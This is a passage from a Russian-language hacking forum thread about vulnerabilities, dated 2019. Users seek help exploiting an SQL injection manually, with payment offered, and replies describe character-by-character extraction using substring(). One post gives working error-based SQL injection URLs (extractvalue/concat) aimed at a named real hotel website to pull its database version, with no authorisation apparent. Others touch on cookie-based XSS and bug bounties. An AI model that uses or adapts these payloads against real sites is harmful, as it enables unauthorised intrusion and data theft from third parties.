HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2601  
Старый 01.05.2019, 00:27
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от vladF  
vladF said:

Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)
В чём проблема?
 
Ответить с цитированием

  #2602  
Старый 01.05.2019, 15:04
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

any help ??
подробней пиши
 
Ответить с цитированием

  #2603  
Старый 01.05.2019, 15:42
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

any help ??
вытаскивать по одному символу через функцию mid() или substring(), а если конкретней пример, то я бы переделал конструкцию запроса
 
Ответить с цитированием

  #2604  
Старый 01.05.2019, 16:26
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Я бы убрал бы груп контакт, действитель, еррор вектор не выводит в один запрос длинные пароли, надо использовать функцию

substring(1,10) дальше substring(11,21) итд
 
Ответить с цитированием

  #2605  
Старый 01.05.2019, 16:38
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

https://alushta-hotel.com.ua/room.php?id=1' and extractvalue(0x0a,concat(0x0a,(select substring(version(),1,2))))+--+-

https://alushta-hotel.com.ua/room.php?id=1' and extractvalue(0x0a,concat(0x0a,(select substring(version(),3,5))))+--+-
 
Ответить с цитированием

  #2606  
Старый 15.05.2019, 04:00
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Если есть XSS куках что можно сделать ?
 
Ответить с цитированием

  #2607  
Старый 15.05.2019, 21:43
LexProm
Guest
Сообщений: n/a
Провел на форуме:
596

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Если есть XSS куках что можно сделать ?
Ничего , разве что как-то заставить юзера прописать руками туда твой скрипт
 
Ответить с цитированием

  #2608  
Старый 16.05.2019, 00:25
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Если есть XSS куках что можно сделать ?
да, зарепортить на hackerone

обычно в нормальных программах это стоит 1000+ уе
 
Ответить с цитированием

  #2609  
Старый 16.05.2019, 04:23
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Цитата:
Сообщение от RWD  
RWD said:

да, зарепортить на hackerone
обычно в нормальных программах это стоит 1000+ уе
Запросят обоснование вектора атаки, а с ним тяжело...
 
Ответить с цитированием

  #2610  
Старый 16.05.2019, 13:04
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

--thread=1 ?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ